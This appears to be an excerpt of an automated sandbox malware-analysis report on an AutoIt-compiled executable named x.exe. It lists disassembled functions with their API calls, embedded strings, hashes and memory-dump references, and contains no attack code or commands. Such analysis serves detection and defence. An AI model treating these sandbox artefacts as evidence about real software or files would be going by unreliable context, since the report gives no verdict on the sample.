                                                                                                                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                                    Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                    • API String ID: 1762048999-758534266
                                                                                                                                                    • Opcode ID: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                                                                                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                    • Opcode Fuzzy Hash: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                                                                                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                                                    Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                                                    • _fseek.LIBCMT ref: 00452B3B
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                                                    • _wcscat.LIBCMT ref: 00452C07
                                                                                                                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2054058615-0
                                                                                                                                                    • Opcode ID: 5ffa14f82790667b1b282f9661ad3f3d24c7149c108a38be8607e6ae2c27b5ff
                                                                                                                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                                    • Opcode Fuzzy Hash: 5ffa14f82790667b1b282f9661ad3f3d24c7149c108a38be8607e6ae2c27b5ff
                                                                                                                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                                    Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                    • API String ID: 0-1896584978
                                                                                                                                                    • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                                                    • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                                                                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                                                    Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000104,?), ref: 00401F4C
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000104), ref: 00428B5B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\x.exe$CMDLINE$CMDLINERAW
                                                                                                                                                    • API String ID: 3948761352-2477885655
                                                                                                                                                    • Opcode ID: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
                                                                                                                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                                    • Opcode Fuzzy Hash: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
                                                                                                                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                                                    Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                    • String ID: D)E$D)E$FILE
                                                                                                                                                    • API String ID: 3888824918-361185794
                                                                                                                                                    • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                                                    • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                                                                    Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                    • _wcscat.LIBCMT ref: 00427541
                                                                                                                                                    • _wcslen.LIBCMT ref: 00427551
                                                                                                                                                    • _wcslen.LIBCMT ref: 00427562
                                                                                                                                                    • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                                    • String ID: Include$\
                                                                                                                                                    • API String ID: 3173733714-3429789819
                                                                                                                                                    • Opcode ID: 97055631afe68ccc8d35a07989050a773b6648bf6af3037baefc2422ebbc3f44
                                                                                                                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                                    • Opcode Fuzzy Hash: 97055631afe68ccc8d35a07989050a773b6648bf6af3037baefc2422ebbc3f44
                                                                                                                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                                                    Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                                    • _fseek.LIBCMT ref: 004529BF
                                                                                                                                                    • _malloc.LIBCMT ref: 004529CA
                                                                                                                                                    • _malloc.LIBCMT ref: 004529D6
                                                                                                                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                                    • _free.LIBCMT ref: 00452A17
                                                                                                                                                    • _free.LIBCMT ref: 00452A20
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1255752989-0
                                                                                                                                                    • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                                                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                                    • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                                                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                                                                    Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00A142E0,000000FF,00000000), ref: 00410552
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                                                                    Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A142E0,000000FF,00000000), ref: 00410552
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                                    Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc
                                                                                                                                                    • String ID: Default
                                                                                                                                                    • API String ID: 1579825452-753088835
                                                                                                                                                    • Opcode ID: 1198bc52e153da64d8690da2c80d8544fbc7663c125e93963ee1fcdb872695e3
                                                                                                                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                    • Opcode Fuzzy Hash: 1198bc52e153da64d8690da2c80d8544fbc7663c125e93963ee1fcdb872695e3
                                                                                                                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
